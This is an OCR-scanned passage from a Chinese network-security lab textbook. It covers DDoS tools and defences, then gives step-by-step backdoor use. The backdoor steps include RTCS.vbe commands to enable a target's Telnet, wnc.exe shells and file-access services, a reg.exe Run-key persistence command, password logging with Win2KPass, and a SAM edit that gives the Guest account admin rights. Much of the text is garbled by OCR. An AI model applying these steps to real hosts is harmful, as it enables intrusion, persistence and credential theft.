在 该 阶段 ,攻击 者 使 用 自动 工具 扫描 远程 脆弱 主机 ,并 采用 典型 的 黑客 人 侵 手段 得 到 这 
些 主机 的 控制 权 ,安装 DDoS 代理 端 (分 布 端 )。 这 些 主机 也 是 DDoS 的 受害 者 。 目 前 还 没 
有 DDoS 工具 能 够 自发 完成 对 代理 端的 入 侵 。 

2. 大 规模 DDoS 攻击 阶段 


该 阶段 即 通 过 主 控 端 和 代理 端 (分 布 端 ) 对 目标 受害 主机 发 起 大 规模 拒绝 服务 攻击 。 
7.43 ”攻击 工具 


DDoS 比较 著名 的 攻击 工具 包括 : Trin00, TFN (Tribe Flood Network) . Stacheldraht 
和 TFN2K(Tribe Flood Network 2000), 

1. Trin00 

1999 年 6 月 Trin00 工具 出 现 , 同 年 8 月 17 日 攻击 了 美国 明尼苏达 大 学 ,当时 该 工具 
集成 了 至 少 227 个 主机 的 控制 权 。 攻 击 包 从 这 些 主机 源源 不 断 地 送 到 明尼苏达 大 学 的 
服务 器 ,造成 其 网 络 严 重 瘫痪 。Trin00 由 三 部 分 组 成 : 客户 端 (攻击 者 ) , 主 控 端 及 分 布 端 
(代理 端 ) 。 代 理 端 向 目标 受害 主机 发 送 的 DDoS 都 是 UDP 报 文 ,这 些 报 文 都 从 一 个 端口 
发 出 ,但 随机 地 袭击 目标 主机 上 的 不 同 端口 。 目标 主机 对 每 一 个 报 文 回 复 一 个 ICMP 
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Port Unreachable 的 信息 ,大 量 不 同 主机 同时 发 来 的 这 些 洪 水 般 的 报 文 使 得 目标 主机 很 快 
瘫痪 。 
2. TFN 


1999 4 8 H TEN 工具 出 现 。 最 初 , 该 工具 基于 UNIX 系统 ,集成 了 ICMP Flooding, 
SYN Flooding,UDP Flooding 和 Smurf 等 多 种 攻击 方式 ,还 提供 了 与 TCP 端口 绑 定 的 命 
令 行 root shell。 同 时 ,TFN 还 在 发 起 攻击 的 平台 上 创建 后 门 ,允许 攻击 者 以 root 身份 访问 
这 台 被 利用 的 机 器 。TFN(Tribal Flood Network) 由 主 控 端 程序 和 代理 端 程序 两 部 分 组 
成 , 它 主要 采取 的 攻击 方法 为 : SYN 风暴 .Ping 风暴 、UDP 炸弹 和 Smurf, 具 有 伪造 数据 包 
的 能 力 。TFN 是 一 种 典型 的 拒绝 服务 程序 , 它 的 目的 是 阻塞 网 络 及 主机 的 正常 通信 ,达到 
瘫痪 目标 网 络 的 目的 。 

3. Stacheldraht 


1999 年 9 月 Stacheldraht 工具 出 现 。 该 工具 是 在 TFN 的 基础 上 开发 出 来 的 ,并 结合 
了 Trin00 的 特点 。 即 它 和 Trin00 一 样 具 有 主 控 端 (代理 端 ) 的 特点 ,又 和 TFN 一样 集 成 了 
ICMP Flooding, SYN Flooding, UDP Flooding 和 Smurf 等 多 种 攻击 方式 。 同 时 ， 
Stacheldraht 还 克服 了 TFN 明文 通信 的 弱点 ,在 攻击 者 与 主 控 端 之 间 采 用 加 密 验 证 通信 机 
制 (对 称 密 钥 加 密 体制 ), 并 具有 自动 升级 的 功能 。 

4. TFN2K(Tribe Flood Network 2000) 


1999 4E 12 月 TFN2K 工具 出 现 , 它 是 TFN 的 升级 版 ,能 从 多 个 源 对 单个 或 多 个 目标 
发 动 攻击 ,该 工具 具有 如 下 特点 。 

(1) 主 控 端 和 代理 端 之 间 进行 加 密 传输 ,其 间 还 混杂 一 些 发 往 任意 地 址 的 无 关 的 包 从 
而 达到 迷惑 的 目的 ,增加 了 分 析 和 监视 的 难度 。 

(2) 主 控 端 和 代理 端 之 间 的 通信 可 以 随机 地 选择 不 同 协议 来 完成 (TCP,UDP,ICMP)， 
代理 端 也 可 以 随机 选择 不 同 的 攻击 手段 (TCP/SYN,UDP,ICMP/Ping,Broadcast Ping/ 
Smurf 等 ) 来 攻击 目标 受害 主机 。 特 别 是 TFN2K 还 尝试 发 送 一 些 非法 报 文 或 无 效 报 文 ,从 
而 导致 目标 主机 十 分 不 稳定 甚至 崩溃 。 

(3) 所 有 从 主 控 端 或 代理 端 发 送出 的 包 都 使 用 TP 地 址 欺骗 来 隐藏 源 地 址 。 

(4) 5j TEN 不 同 ,TFN2K 的 代理 端 是 完全 沉默 的 , 它 不 响应 来 自主 控 端 的 命令 。 主 控 
端 会 将 每 个 命令 重复 发 送 20 次 ,一 般 情况 下 代理 端 可 以 至 少 收 到 一 次 该 命令 。 

(5) 5j TFN 和 Stacheldraht 不 同 ,TFN2K 的 命令 不 是 基于 字符 串 的 。 其 命令 的 形式 
Jg" o ido data", Hrpid A — 45635 oA Bog sir data f p 
的 参数 。 所 有 的 命令 都 使 用 基于 密 钥 的 CAST-256 算法 加 密 (RFC2612) ,该 密 钥 在 编译 时 
确定 并 作为 运行 该 主 控 端 的 密码 。 

7.4.4 DDoS 的 检测 

现在 网 上 采用 DDoS 方式 进行 攻击 的 攻击 者 日 益 增 多 ,我们 只 有 及 早 发 现 自己 受到 攻 
击 才能 避免 遭受 惨重 的 损失 ,检测 DDoS 攻击 的 主要 方法 有 以 下 几 种 。 

1. 根据 异常 情况 分 析 

当 网 络 的 通信 量 突然 急剧 增长 ,超过 平常 的 极限 值 时 ,一 定 要 提高 警惕 ,检测 此 时 的 通 
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信 ; 当 网 站 的 某 一 特定 服务 总 是 失败 时 ,也 要 多 加 注意 ; 当 发 现 有 特大 型 的 TCP 和 UDP 
数据 包 通 过 或 数据 包 内 容 可 疑 时 都 要 留神 。 总 之 , 当 机 器 出 现 异 常情 况 时 ,最 好 分 析 这 些 情 
况 , 防 患 于 未 然 。 

2. 使 用 DDoS 检测 工具 

当 攻 击 者 想 使 其 攻击 阴谋 得 件 时 ,他 首先 要 扫描 系统 漏洞 ,目前 市 面 上 的 一 些 网 络 信 侵 
检测 系统 ,可 以 杜绝 攻击 者 的 扫描 行为 。 另 外 ,一 些 扫描 器 工具 可 以 发 现 攻 击 者 植 人 系统 的 
代理 程序 ,并 可 以 把 它 从 系统 中 删除 。 


7.4.5 DDoS 攻击 的 防御 策略 


由 于 DDoS 攻击 具有 隐蔽 性 ,因此 到 目前 为 止 我 们 还 没有 发 现 对 DDoS 攻击 行 之 有 效 
的 解决 方法 。 所 以 我 们 要 加 强 安全 防范 意识 ,提高 网 络 系统 的 安全 性 。 可 采取 的 安全 防御 
措施 有 以 下 几 种 。 

(1) 及 早 发 现 系统 存在 的 攻击 漏洞 ,及 时 安装 系统 补丁 程序 。 对 一 些 重要 的 信息 (例如 
系统 配置 信息 ) 建 立 和 完善 备份 机 制 。 对 一 些 特权 账号 (例如 管理 员 账 号 ) 的 密码 设置 要 说 
慎 。 通 过 这 样 一 系列 的 举措 可 以 把 攻击 者 的 可 乘 之 机 降低 到 最 小 。 

(2) 在 网 络 管理 方面 ,要 经 常 检查 系统 的 物理 环境 ,禁止 那些 不 必要 的 网 络 服务 。 建 立 
边界 安全 界限 ,确保 输出 的 包 受 到 正确 限制 。 经 常 检测 系统 配置 信息 ,并 注意 查看 每 天 的 安 
全 日 志 。 

(3) 利用 网 络 安全 设备 (例如 防火 墙 ) 来 加 固 网 络 的 安全 性 ,配置 好 它们 的 安全 规则 ,过 
滤 掉 所 有 可 能 的 伪造 数据 包 。 

(4) 比较 好 的 防御 措施 就 是 和 你 的 网 络 服 务 提供 商 协调 工作 ,让 他 们 帮助 你 实现 路 由 
的 访问 控制 和 对 带宽 总 量 的 限制 。 

(5) 当 你 发 现 自己 正在 遭受 DDoS 攻击 时 ,你 应 当 启动 自己 的 应 付 策略 , 尽 可 能 快 地 追 
踪 攻 击 包 ,并 且 要 及 时 联系 ISP 和 有 关 应 急 组 织 , 分 析 受 影响 的 系统 ,确定 涉及 的 其 他 节点 ， 
从 而 阻挡 已 知 攻击 节点 的 流量 。 

(6) 如 果 你 是 潜在 的 DDoS 攻击 受害 者 , 当 你 发 现 自己 的 计算 机 被 攻击 者 用 做 主 控 端 
和 代理 端 时 ,你 不 能 因为 你 的 系统 暂时 没有 受到 损害 而 掉以轻心 ,攻击 者 已 发 现 你 系统 的 漏 
洞 ,这 对 你 的 系统 是 一 个 很 大 的 威胁 。 所 以 一 旦 发 现 系统 中 存在 DDoS 攻击 的 工具 软件 要 
及 时 把 它 清除 ,以 免 留 下 后 患 。 


J 题 7 


一 、 填空 题 
. DoS 攻击 的 目的 是 。 最 常见 的 DoS 攻击 是 和 
. SYN 风暴 属于 攻击 。 

- SYN flooding 攻击 即 是 利用 设计 的 弱点 。 

. Smurf 攻击 结合 使 用 了 和 


上 co 
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5. Smurf 攻击 行为 的 完成 涉及 三 个 元 素 : 


6. DDoS 攻击 的 顺序 为 : 


二 、 简 答题 
1. 如 何 防范 SYN 风暴 ? 
2. DDoS 攻击 的 防御 策略 是 什么 ? 


第 8 章 网 络 后 门 与 隐身 


后 门 程序 一 般 是 指 那些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 程序 。 在 软件 的 
开发 阶段 ,程序 员 常 常会 在 软件 内 创建 后 门 程序 以 便 可 以 修改 程序 设计 中 的 缺陷 。 但 是 ,如 
果 这 些 后 门 被 其 他 人 知道 ,或 是 在 发 布 软件 之 前 没有 删除 后 门 程序 ,那么 它 就 成 了 安全 风 
仿 , 容 易 被 黑客 当成 漏洞 进行 攻击 。 

只 要 能 不 通过 正常 登录 进入 系统 的 途径 都 称 之 为 网 络 后 门 。 后 门 的 好 坏 取决 于 被 管理 
员 发 现 的 概率 。 只 要 是 不 容易 被 发 现 的 后 门 都 是 好 后 门 。 留 后 门 的 原理 和 选 间谍 是 一 样 
的 ,让 管理 员 看 了 感觉 没有 任何 特别 之 处 。 


8.1 后 门 基础 


8.1.1 后 门 的 定义 


后 门 程序 又 称 特 洛 依 木马 ,其 用 途 在 于 潜伏 在 电脑 中 ,从 事 搜集 信息 或 便于 黑客 进入 的 
工作 。 后 门 程序 和 电脑 病毒 最 大 的 差别 ,在 于 后 门 程序 不 一 定 有 自我 复制 的 动作 ,也 就 是 后 
门 程序 不 一 定 会 “感染 ”其 他 电脑 。 

后 门 是 一 种 登录 系统 的 方法 , 它 不 仅 绕 过 系统 已 有 的 安全 设置 ,而 且 还 能 挫败 系统 上 各 
种 增强 的 安全 设置 。 

后 门 从 简单 到 复杂 ,有 很 多 的 类 型 。 简 单 的 后 门 可 能 只 是 建立 一 个 新 的 账号 ,或 者 
接管 一 个 很 少 使 用 的 账号 ; 复杂 的 后 门 ( 包 括 木 马 ) 可 能 会 绕 过 系统 的 安全 认证 而 对 系统 
有 安全 存 取 权 。 例 如 一 个 login 程序 , 当 你 输入 特定 的 密码 时 ,就 能 以 管理 员 的 权限 来 存 
取 系 统 。 

后 门 能 相互 关联 ,而 且 这 个 技术 被 许多 黑客 所 使 用 。 例 如 ,黑客 可 能 使 用 密码 破解 一 个 
或 多 个 账号 密码 ,黑客 可 能 会 建立 一 个 或 多 个 账号 。 一 个 黑客 可 以 存 取 这 个 系统 ,黑客 可 能 
使 用 一 些 技术 或 利用 系统 的 某 个 漏洞 来 提升 权限 。 黑 客 可 能 会 对 系统 的 配置 文件 进行 小 部 
分 的 修改 ,以 降低 系统 的 防卫 性 能 ; 也 可 能 会 安装 一 个 木马 程序 ,使 系统 打开 一 个 安全 漏 
洞 , 以 利于 黑客 完全 掌握 系统 。 

以 上 是 对 * 后 门 ”的 解释 ,其 实 我 们 可 以 用 很 简单 的 一 句 话 来 概括 它 : 后 门 就 是 留 在 计 
算 机 系统 中 , 供 黑客 特殊 使 用 并 通过 某 种 特殊 方式 控制 计算 机 系统 的 途径 。 很 显然 ,知己 知 
彼 才 能 百 战 不 至 ,掌握 好 后 门 技术 是 每 个 网 络 管理 者 必 备 的 基本 技能 。 

后 门 程序 , 跟 我 们 通常 所 说 的 “木马 有 联系 也 有 区 别 。 

联系 在 于 : 它们 都 是 隐藏 在 用 户 系统 中 向 外 发 送信 息 , 而 且 本 身 具有 一 定 权 限 ,以 便于 
远程 机 器 对 本 机 的 控制 。 

区 别 在 于 : 木马 是 一 个 完整 的 软件 ,而 后 门 则 体积 较 小 且 功能 都 很 单一 ,而 且 在 病毒 命 
名 中 ,后 门 一 般 带 有 Backdoor 字样 ,而 木马 一 般 则 是 Trojan 字样 。 
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8.1.2 后 门 的 分 类 


后 门 可 以 按照 很 多 方式 来 分 类 ,标准 不 同 自然 分 类 就 不 同 ,为 了 便于 大 家 理解 ,我 们 从 
技术 方面 来 考虑 后 门 程序 的 分 类 方法 。 

1. 网 页 后 门 

此 类 后 门 程序 一 般 都 是 用 服务 器 上 正常 的 Web 服务 来 构造 自己 的 连接 方式 ,比如 非常 
流行 的 ASP.CGI 脚本 后 门 等 ,具有 代表 性 的 软件 是 海 阳 顶 端 , 海 阳 顶端 功能 是 非常 强大 
的 ,而 且 不 容易 被 查 杀 。 

2. 线程 插入 后 门 

利用 系统 自身 的 某 个 服务 或 者 线程 ,将 后 门 程序 插入 到 其 中 ,这 种 后 门 在 运行 时 没有 进 
程 , 所 有 网 络 操作 均 插入 到 其 他 应 用 程序 的 进程 中 完成 。 也 就 是 说 ,即使 受 控制 端 安装 的 防 
火 墙 拥有 “应 用 程序 访问 权限 ”的 功能 ,也 不 能 对 这 样 的 后 门 进 行 有 效 的 警告 和 拦截 ,也 就 使 
对 方 的 防火 墙 形 同 虚设 了 ,因为 对 它 的 查 杀 比较 困难 ,这 种 后 门 本 身 的 功能 比较 强大 ,代表 
性 的 软件 是 小 榕 的 BITS, 使 用 范围 : Windows 2000/XP/2003。 

3. 扩展 后 门 

所 谓 的 扩展”, 是 指 在 功能 上 有 大 的 提升 , 比 普通 的 单一 功能 的 后 门 有 更 强 的 实用 性 。 
从 普通 意义 上 理解 ,可 以 看 成 是 将 非常 多 的 功能 集成 到 了 后 门 里 ,让 后 门 本 身 就 可 以 实现 很 
多 功能 ,方便 直接 控制 肉鸡 或 者 服务 器 。 这 类 的 后 门 非常 受 初学 者 的 喜爱 ,通常 集成 了 文件 
上 传 /下 载 、 系 统 用 户 检测 .HTTP 访问、 终端 安装 .端口 开放 .启动 /停止 服务 等 功能 ,本 身 
就 是 个 小 的 工具 包 , 功 能 强大 ,能 实现 非常 多 的 常见 安全 功能 ,适合 新 手 使 用 。 代 表 性 的 软 
件 是 WinEggDrop Shell, 使 用 范围 : Windows 2000/XP/2003。 

4. C/S 后 门 

C/S 后 门 采用 和 传统 的 木马 程序 类 似 的 控制 方法 ,客户 端 /服务 端的 控制 方式 ,通过 
某 种 特定 的 访问 方式 来 启动 后 门 进而 控制 服务 器 。 比 较 巧 妙 的 就 是 ICMP Door 了 ,这 个 后 
门 利用 ICMP 通道 进行 通信 ,所 以 不 开 任 何 端口 ,只 是 利用 系统 本 身 的 ICMP 包 进 行 控 制 安 
装 成 系统 服务 后 ,开机 自动 运行 ,可 以 穿 透 很 多 防火 墙 ,很 明显 可 以 看 出 它 的 最 大 特点 : 不 
开 任 何 端口 ,只 通过 ICMP 控制 。 和 上 面 任何 一 款 后 门 程序 相 比 , 它 的 控制 方式 是 很 特殊 
的 , 连 80 端口 都 不 用 开放 ,使 用 范围 : Windows 2000/XP/2003。 

最 著名 的 后 门 程序 ,是 微软 的 Windows Update; Windows Update 的 动作 不 外 乎 以 下 
三 个 : 开机 时 自动 连 上 微软 的 网 站 ,将 电脑 的 现 况 报告 给 网 站 以 进行 处 理 ,网 站 通过 
Windows Update 程序 通知 使 用 者 是 否 有 必须 更 新 的 文件 ,以 及 如 何 更 新 。 如 果 我 们 针对 
这 些 动 作 进行 分 析 , 则 “开机 时 自动 连 上 微软 网 站 ”的 动作 就 是 后 门 程序 特性 中 的 “潜伏 ”, 而 
“将 电脑 现 况 报 告 ”的 动作 是 “搜集 信息 ”。 因 此 ,虽然 微软 说 它 不 会 搜集 个 人 电脑 中 的 信息 ， 
但 如 果 我 们 从 Windows Update 来 进行 分 析 的 话 , 就 会 发 现 它 必须 搜集 个 人 电脑 的 信息 才 
能 进行 操作 ,所 差 者 只 是 搜集 了 哪些 信息 而 已 。 


8.1.3 ”使 用 “冰河 ”木马 进行 远程 控制 
常见 的 木马 有 NetBus 远程 控制 “冰河 ”木马 .PCAnyWhere 远程 控制 等 。 我 们 使 用 的 


154 计算 机 网 络 安全 与 实验 教程 


是 一 种 最 常见 的 木马 程序 :“ 冰 河 ”。“ 冰 河 ” 包 含 两 个 程序 文件 ,一 个 是 服务 器 端 , 男 一 个 是 
客户 端 。 具体 步骤 参见 第 9 章 实验 三 十 四 。 


8.2 ”后门 工具 的 使 用 
8.2.1 使 用 工具 RTCS. vbe 开启 对 方 的 Telnet 服务 


利用 主机 上 的 Telnet 服务 ,有 管理 员 密 码 就 可 以 登录 到 对 方 的 命令 行 ,进而 操作 对 方 
的 文件 系统 。 如 果 Telnet 服务 是 关闭 的 ,就 不 能 登录 了 。 

利用 工具 RTCS. vbe 可 以 远程 开启 对 方 的 Telnet 服务 ,使 用 该 工具 需要 知道 对 方 具有 
管理 员 权 限 的 用 户 名 和 密码 。 

命令 是 :“cscript RTCS. vbe 192. 168. 1. 2 administrator 123456 1 23”。 其 中 

。 cscript 是 操作 系统 自 带 的 命令 

。 RTCS. vbe 是 该 工具 软件 脚本 文件 

。 IP 地 址 是 要 启动 Telnet 的 主机 地 址 

。 administrator 是 用 户 名 

。 123456 是 密码 

。 1 为 NTLM 身份 验证 

。 23 是 Telnet 开放 的 端口 

该 命令 根据 网 络 的 速度 ,执行 的 时 候 需要 一 段 时 间 , 可 以 开启 远程 Telnet. 服务 ,如 图 8-1 
所 示 。 执 行 完成 后 ,对 方 的 Telnet 服务 就 被 开启 了 。 在 DOS 提示 符 下 ,可 以 登录 目标 主机 
的 Telnet 服务 ,首先 输入 命令 “Telnet 192. 168. 1. 2”, 因 为 Telnet 的 用 户 名 和 密码 是 明文 


:MRTCS»cscript RTCS.ube 192.168.1.2 administrator 123456 1 23 
icrosoft (R) Windows Script Host Version 5.6 
权 所 有 (5) Microsoft Corporation 1996-2991。 保 留 所 有 权利 。 


MAG WE WW OA AOA M HOM B OM HA MAH HH AN AA AGAR AUN M UAR 
TCS v1.08 

emote Telnet Configure Script, by zzzeuazzz 

lelcome to visite www.isgreu.com 

sage: 

script C:\RTCS\RTCS.ube targetIP username password NTLMAuthor telnetport 
t will auto change state of target telnet server. 

MAH M M HO M AH OH B M MOM A M MO M AG OM MO MOM MON B M DE M MA M M MU M M IA M MG MG GO 


onneting 172.18.25.109.... 


EELEE 


uerying state of telnet seruer.... 
hangeing state.... 
Kt 


arget telnet server has been START Successfully! 
low, you can try: telnet 172.18.25.109 23, to get a shell. 


:ARTCS> 


8-1 远程 开启 对 方 的 Telnet 服务 
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传递 的 ,首先 出 现 确认 发 送信 息 对 话 框 , 如 图 8-2 所 示 。 输 入 Telnet 的 用 户 名 和 密码 ,输入 
字符 “y”, 进 入 Telnet 的 登录 界面 ,需要 输入 主机 的 用 户 名 和 密码 ,如 图 8-3 所 示 。 登 录 


T. 


体 使 用 步骤 请 参考 第 9 章 实验 二 十 九 。 


t 172.18.25.109 


icrosoft (R) a 
欢迎 使 用 Microsoft Telnet Client 
[Telnet Client 内 部 版 本 号 5.00.99203.1 


lEscape 字符 为 “CTRL+]" 


您 将 要 发 送 密码 信息 到 Internet 区 域 中 的 远程 计算 机 。 这 可 能 不 安全 。 是 否 还 要 发 送 (y/n): y 


8-2 ”确认 对 话 框 


C\WINNT\System32\cmd.exe - telnet 172.18.25.109 


NTLM Authentication failed due to insufficient credentials. Please login with 
lear text username and password 

icrosoft (R) Windows (TM) Uersion 5.00 (Build 2195) 

elcome to Microsoft Telnet Service 

Telnet Seruer Build 5.00.99201.1 

login: administrator 

password: xxxxxx 


8-3 ”用户 名 和 密码 登录 Telnet 


telnet 172.18.25.109 


图 8-4 登录 成 功 


KERHA: NTLM 身份 验证 

NTLM 身份 验证 选项 有 三 个 值 ,默认 是 2。 可 能 的 值 有 以 下 几 种 。 
(1) 0: 不 使 用 NTLM 身份 验证 。 

(2) 1: AŽ NTLM 身份 验证 ,如 果 失 败 , 再 使 用 用 户 名 和 密码 。 
(3) 2: 只 使 用 NTLM 身份 验证 。 


elnet 服务 器 ,如 果 用 户 名 和 密码 没有 错误 ,将 进入 对 方 主机 的 命令 行 ,如 图 8-4 所 示 。 具 
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从 工作 流程 我 们 可 以 看 出 ,NTLM 是 以 当前 用 户 的 身份 向 Telnet 服务 器 发 送 登录 请 
求 的 ,而 不 是 用 你 自己 的 账户 和 密码 登录 :如果 用 默认 值 2 登录 ,显然 ,你 的 登录 将 会 失败 。 

举 个 例子 来 说 ,你 家 的 机 器 名 为 A( 本 地 机 器 ) ,你 登录 的 机 器 名 为 B( 远 地 机 器 ) ,你 在 
A 上 的 账户 是 ABC ,密码 是 1234, 你 在 B 上 的 账号 是 XYZ, 密 码 是 5678。 当 你 想 Telnet 到 
B 时 ,NTLM 将 自动 以 当前 用 户 的 账号 和 密码 作为 登录 的 凭据 来 进行 登录 , 即 用 ABC 和 
1234 ,而 并 非 用 你 要 登录 的 账号 XYZ 和 5678, 且 这 些 都 是 自动 完成 的 ,因此 你 的 登录 操作 
将 失败 ,因此 我 们 需要 将 NTLM 的 值 设置 为 0 或 者 1。 


8.2.2 使 用 工具 wie 开启 对 方 的 Telnet 服务 


使 用 工具 软件 wnc. exe 可 以 在 对 方 的 主机 上 开启 Telnet 服务 。 其 中 Telnet 服务 的 端 
口 是 707。 具 体 使 用 步骤 请 参考 第 9 章 实 验 三 十 。 
在 对 方 的 操作 系统 下 执行 wnc. exe, 如 图 8-5 所 示 。 可 以 用 建立 信任 连接 复制 ,然后 


8-5 ”建立 Telnet 服务 


可 以 利用 “telnet 192. 168. 1. 5 707” 命 令 登 录 到 对 方 的 命令 行 ,执行 的 方法 如 图 8-6 所 
示 。 不 用 任何 的 用 户 名 和 密码 就 可 以 登录 到 对 方 主 机 的 命令 行 ,如 图 8-7 所 示 。 


Microsoft Windows 2000 [Uersion 5.00.2195] 
(C) 版 权 所 有 1985-2000 Microsoft Corp. 


C:\>telnet 192.168.1.5 707 


8-6 登录 对 方 主机 


8.2.3 使 用 工具 wnc 建立 远程 主机 的 Web 服务 


使 用 工具 软件 wne. exe 可 以 在 对 方 的 主机 上 开启 Web 服务 ,其 中 Web 服务 的 端口 是 
808。 具 体 使 用 步骤 请 参考 第 9 章 实 验 三 十 。 

步骤 1: 在 对 方 的 操作 系统 下 执行 一 次 wne. exe, 如 图 8-8 所 示 。 可 以 用 建立 信任 连接 
复制 ,然后 执行 。 

步骤 2: 执行 完毕 后 ,利用 命令 “netstat -an” 来 查看 开启 的 808 和 707 端口 ,如 图 8-9 
所 示 。 
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© CAWINNT\System32\cmd.exe - telnet 172.18.25.109 707 


icrosoft Windows 2000 [Version 5.00.2195] 
C) 版 权 所 有 1985-1998 Microsoft Corp. 


E: Nnc»ipconfig 

Nindows 2000 IP Configuration 
Ethernet adapter 本 地 连接 : 
Connection-specific DNS Suffix 


IP ROIO. uso ore cvs d 392.168 1.5 
Sc eue gm swaar 399. e09.295.0 


图 8-7 ”验证 登录 成 功 


1'wmnc?unc -exe 


:wwnc>^R 


8-8 建立 Web 服务 


cmnetstat -an 


Active Connections E 

Proto State 

TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 
TCP LISTENING 


TCP 


LISTENING 
LISTENING 
LISTENING 
LISTENING 


TCP 
TCP 


图 8-9 端口 开启 


LISTENING: 正在 监听 ,显示 LISTENING 项 的 端口 ,意思 是 别 的 计算 机 可 以 连接 该 
端口 ,本 地 计算 机 会 主动 接受 并 执行 一 些 服 务 ,并 返回 结果 给 连接 的 客户 端 。 

TIME_WAIT: 等 待 连接 。 

ESTABLISHED: 正在 连接 中 ,表示 两 台 机 器 正在 通信 o 

SYN RECEIVED: 正在 处 于 连接 的 初始 同步 状态 , 当 有 多 个 SYN_RECEIVED 状态 
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时 ,你 可 能 中 了 SYN Flood 攻击 。 

CLOSE WAIT: 对 方 已 经 关闭 ,对 方 主动 关闭 连接 或 者 网 络 异常 导致 连接 中 断 ,这 时 
我 方 的 状态 会 变 成 CLOSE_WAIT 此 时 我 方 要 调用 close() 来 使 得 连接 正确 关闭 。 

步骤 3: 测试 Web 服务 808 端口 ,在 浏览 器 地 址 栏 中 输入 http: //192. 168. 1. 5:808 ,出 
现 主机 的 盘 符 列表 ,如 图 8-10 所 示 。 可 以 下 载 对 方 硬盘 和 光盘 上 的 任意 文件 (对 于 汉字 文 
件 名 的 文件 下 载 有 问题 ) ,可 以 到 WINNT/Temp 目录 下 查看 对 方 密码 修改 记录 文件 
(Config. ini) ,如 图 8-11 所 示 。 从 图 8-11 我 们 看 到 ,该 Web 服务 还 提供 文件 上 传 的 功能 ,可 
以 上 传 本 地 文件 到 对 方 服务 器 的 任意 目录 。 


eni- +- ODALAR uem Quas J D aad- HLA 
HEIE) |ia] http://192. 168. 1. 5:808 


E HACKER 


©) Fixed Bytes free: 21620/40788 
£ CDRON 


Network Neighborhood 


图 8-10 ”登录 到 Web 


+a- 2- OAA Qm aar as Q i34. J* D 


Date Time Size Filename 
10-18-2002 20:45 <DIR> a Y 
10-18-2002 20:45 <DIR> 
11-03-2003 01:12 <DIR> A Enron TNP 1. DIRA 
11-27-2003 23:46 117 Bill.tzt 
11-27-2003 23:17 ni EXE sini 


228 Bytes, 2 Files, 3 Folders 


wiam || — — — ME 


T] http://172-18.25.109:808/ DRIVE: [WINNT [Temp] Config. iei [OD [inteme á 


图 8-11 上 传 和 下 载 界面 


8.2.4 将 wnc 加 到 自 启动 程序 中 


wnc. exe 的 功能 强大 ,但 是 该 程序 不 能 自动 加 载 执行 ,需要 将 该 文件 加 到 自 启动 程序 列 
表 中 。 
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一 般 将 wnc. exe 文件 放 到 对 方 的 WINNT 目录 或 者 WINNT/System32 目下 ,这 两 个 
目录 是 系统 环境 目录 ,执行 这 两 个 目录 下 的 文件 不 需要 给 出 具体 的 路 径 。 

首先 将 wnc. exe 和 reg. exe 文件 复制 到 对 方 的 WINNT 目录 下 ,利用 reg. exe 文件 将 
wnc. exe 加 载 到 注册 表 的 自 启动 项 目 中 ,命令 的 格式 为 : 


reg. exe add HKLM\ SOFTWARE\Microsof t\Windows\CurrentVersion\Run /v service /d wnc. exe 


执行 过 程 如 图 8-12 Bros ,具体 使 用 步骤 请 参考 第 9 章 实验 三 十 。 


:\reg.exe add HKLMNSOFTURREWMicrosoft Windows NCurrentUÜersion*NRun /v service 《Ad 一 
unc -exe 


作成 功 结束 


:Vo 


8-12 ”加 到 自 启动 程序 中 
如 果 可 以 进入 对 方 主机 的 图 形 界面 ,可 以 查看 一 下 对 方 的 注册 表 的 自 启动 项 ,已 经 被 修 
改 ,如 图 8-13 所 示 。 
加 
E 


EB ANO DEC KIND SMI 


J BE 
REG SZ (数值 未 设置 ) 


REG SZ wnc.exe 
REG, SZ CIWINNTISystem3 
REG SZ C:\Program Flesl V 
C:\Program Fes 


图 8-13 更 改 的 注册 表 


8.2.5 记录 管理 员 口 令 修改 过 程 


当 入 侵 到 对 方 主机 并 得 到 管理 员 口 令 以 后 ,就 可 以 对 主机 进行 长 入 入 侵 了 ,但 是 一 个 好 
的 管理 员 一 般 每 隔 半 个 月 左右 就 会 修改 一 次 密码 ,这 样 已 经 得 到 的 密码 就 不 起 作用 了 。 

利用 工具 软件 Win2KPass. exe 记录 修改 的 新 密码 ,该 软件 将 密码 记录 在 WINNT\ 
Temp 目录 下 的 Config. ini 文件 中 ,有 时 候 文 件 名 可 能 不 是 Config, 但 是 扩展 名 一 定 是 ini. 
该 工具 软件 有 “自杀 ”的 功能 ,就 是 当 执 行 完 毕 后 ,自动 删除 自己 。 

步骤 1: 在 对 方 操作 系统 中 执行 Win2KPass. exe 

首先 在 对 方 操作 系统 中 执行 Win2KPass. exe 文件 (利用 信任 连接 复制 即 可 ) , 当 对 方 主 
机 管理 员 密 码 修改 并 重启 计算 机 以 后 ,就 在 WINNT\Temp 目录 下 产生 一 个 ini 文件 ,如 
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图 8-14 所 示 o 


i C] msapps IERBII: 2003-11-28 7:17 
aume 大 小 : 111 字 节 


SE RESE AAFP 


图 8-14 ”修改 密码 后 产生 的 ini 文件 
步骤 2: 查看 密码 
打开 该 文件 可 以 看 到 修改 后 的 新 密码 ,如 图 8-15 所 示 , 具 体 使 用 步骤 请 参考 第 9 章 实 
Aj Configini - EP 


2003-11-28 7:17:10 


PE 
User=administrator; Pass=abcde; Domain=HACKER 


8-15 密码 内 容 


8.2.6 让 禁用 的 Guest 具有 管理 权限 


步骤 1: 查看 对 方 主 机 winlogon. exe 的 进程 号 

可 以 利用 工具 软件 psu. exe 得 到 该 键 值 的 查看 和 编辑 权 。 将 psu. exe 复制 到 对 方 主机 
的 C 盘 下 ,并 在 任务 管理 器 中 查看 对 方 主机 winlogon. exe 进程 的 ID 号 或 者 使 用 pulist. exe 
文件 查看 该 进程 的 ID 号 ,如 图 8-16 所 示 。 

从 图 中 我 们 可 以 看 出 其 进程 号 为 192, 下 面 执行 命令 *psu -p regedit -i pid”, 如 图 8-17 
所 示 ,其 中 pid 为 winlogon. exe 的 进程 号 。 

步骤 2: 查看 SAM 键 值 

在 执行 psu 命令 的 时 候 必须 将 注册 表 关 闭 , 执 行 完 命令 以 后 ,自动 打开 了 注册 表 编 辑 
器 ,查看 SAM 下 的 键 值 ,如 图 8-18 所 示 ,查看 Administrator 和 Guest 默认 的 键 值 。 从 图 中 
可 以 看 出 ,Administrator 一 般 为 0xlf4,Guest 一 般 为 Oxlf5. 8 d$ "Ox1f4" d "Ox1f5 " dx F) 
Administrator 和 Guest 账户 的 配置 信息 ,如 图 8-19 所 示 。 
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BITUTIILIINENEENENEENSSS Lin 
